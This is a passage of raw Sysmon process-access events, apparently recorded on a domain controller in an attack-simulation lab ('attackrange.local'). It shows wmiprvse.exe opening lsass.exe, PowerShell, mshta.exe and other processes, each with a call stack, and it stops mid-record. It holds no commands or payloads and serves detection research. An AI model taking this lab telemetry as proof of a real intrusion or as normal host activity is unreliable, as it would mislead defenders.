15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.393{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2A79-6010-97A1-00000000A301}7040C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.205{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files 